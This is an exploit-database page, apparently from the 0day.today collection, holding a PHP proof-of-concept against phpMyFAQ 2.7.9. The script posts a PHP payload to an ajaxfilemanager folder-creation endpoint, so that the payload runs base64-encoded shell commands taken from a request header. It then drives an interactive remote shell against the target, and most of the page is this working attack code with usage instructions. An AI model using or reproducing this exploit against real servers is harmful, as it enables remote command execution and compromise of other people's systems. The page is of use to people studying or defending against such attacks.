Home / os / winmobile

phpMyFAQ 2.7.9 PHP Code Injection

Posted on 23 December 2015

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /'  __ /'__` / \__ /'__` 0
0 /\_,  ___ /\_/\_   ___  ,_/ /  _ ___ 1
1 /_/  /' _ ` / /_/_\_<_ /'___  /    /`'__ 0
0   / /    /   / \__/  \_  \_   / 1
1  \_ \_ \_\_   \____/ \____\ \__\ \____/ \_ 0
0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1
1  \____/ >> Exploit database separated by exploit 0
0 /___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : http://0day.today 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 #################################### 1
0 I'm indoushka member from Inj3ct0r Team 1
1 #################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
| # Title : phpmyfaq 2.7.9 Remote PHP Code Injection Exploit
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Tested on: windows 8.1 Français V.(Pro)
| # Vendor : http://www.phpmyfaq.de/
========================================================================

Poc :

<?php

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
{
 if (!($sock = fsockopen($host, 80)))
 die( "
[-] No response from {$host}:80
");

 fwrite($sock, $packet);
 return stream_get_contents($sock);
}

print "#[+] Author: indoushka
";

if ($argc < 3)
{
 print "
Usage......: php $argv[0] <host> <path>";
 print "
Example....: php $argv[0] localhost /";
 print "
Example....: php $argv[0] localhost /Dmarket/
";
 die();
}

$host = $argv[1];
$path = $argv[2];

$exploit = "foo=<?php error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>";
$packet = "POST {$path}admin/editor/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0
";
$packet .= "Host: {$host}
";
$packet .= "Content-Length: ".strlen($exploit)."
";
$packet .= "Content-Type: application/x-www-form-urlencoded
";
$packet .= "Connection: close

{$exploit}";

http_send($host, $packet);

$packet = "GET {$path}admin/editor/plugins/ajaxfilemanager/inc/data.php HTTP/1.0
";
$packet .= "Host: {$host}
";
$packet .= "Cmd: %s
";
$packet .= "Connection: close

";

while(1)
{
 print "
OL-shell> ";
 if (($cmd = trim(fgets(STDIN))) == "exit") break;
 preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ?
 print $m[1] : die("
[-] Exploit failed!
");
}

?>

Greetz :
jericho http://attrition.org & http://www.osvdb.org/ * http://packetstormsecurity.com
Hussin-X *D4NB4R* KnocKout * https://www.corelan.be *
---------------------------------------------------------------------------------------

 

TOP

Malware :

Exploits :